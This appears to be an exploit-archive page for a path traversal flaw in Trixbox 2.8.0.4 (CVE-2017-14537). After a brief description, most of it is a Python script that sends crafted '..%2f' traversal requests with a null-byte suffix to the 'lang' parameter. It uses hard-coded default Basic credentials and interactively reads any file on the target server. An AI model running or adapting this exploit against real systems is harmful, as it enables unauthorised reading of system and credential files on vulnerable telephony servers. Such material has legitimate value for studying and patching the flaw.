Trixbox 2.8.0.4 Path Traversal

Trixbox version 2.8.0.4 has path traversal via the xajaxargs array parameter to /maint/index.php?packages or the lang parameter to /maint/modules/home/index.php.


MD5 | ebe53272a318e753d01ffa4b44a12413

# Exploit Title: Trixbox 2.8.0.4 - 'lang' Path Traversal
# Date: 27.05.2021
# Exploit Author: Ron Jost (Hacker5preme)
# Credits to: https://secur1tyadvisory.wordpress.com/2018/02/13/trixbox-multiple-path-traversal-vulnerabilities-cve-2017-14537/
# Credits to: Sachin Wagh
# Vendor Homepage: https://sourceforge.net/projects/asteriskathome/
# Software Link: https://sourceforge.net/projects/asteriskathome/files/trixbox%20CE/trixbox%202.8/trixbox-2.8.0.4.iso/download
# Version: 2.8.0.4
# Tested on: Xubuntu 20.04
# CVE: CVE-2017-14537

'''
Description:
trixbox 2.8.0.4 has path traversal via the xajaxargs array parameter to /maint/index.php?packages or the
lang parameter to /maint/modules/home/index.php.
'''


'''
Import required modules:
'''
import requests
import sys
import urllib.parse


'''
User-Input:
'''
target_ip = sys.argv[1]
target_port = sys.argv[2]


'''
Construct malicious request:
'''
# Constructing header:
header = {
'Host': target_ip,
'User-Agent': 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
'Accept-Encoding': 'gzip, deflate',
'Connection': 'keep-alive',
'Cookie': 'template=classic; lng=en; lng=en',
'Upgrade-Insecure-Requests': '1',
'Authorization': 'Basic bWFpbnQ6cGFzc3dvcmQ=',
}

# Constructing malicious link (payload):
base_link = 'http://' + target_ip + ':' + target_port
base_link_addon_1 = '/maint/modules/home/index.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..'
base_link_addon_3 = '%00english'
print('')
base_link_addon_2 = input('Input the filepath or input EXIT: ')



'''
EXPLOIT:
'''
while base_link_addon_2 != 'EXIT':
base_link_addon_2_coded = urllib.parse.quote(base_link_addon_2, safe='')
exploit_link = base_link + base_link_addon_1 + base_link_addon_2_coded + base_link_addon_3
print('')
exploit = requests.post(exploit_link, headers=header)
print('Contents of ' + base_link_addon_2 + ':')
for data in exploit.iter_lines():
data = data.decode('utf-8')
if data != '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">':
print(data)
else:
break
print('')
base_link_addon_2 = input('Input the filepath or input EXIT: ')


Related Posts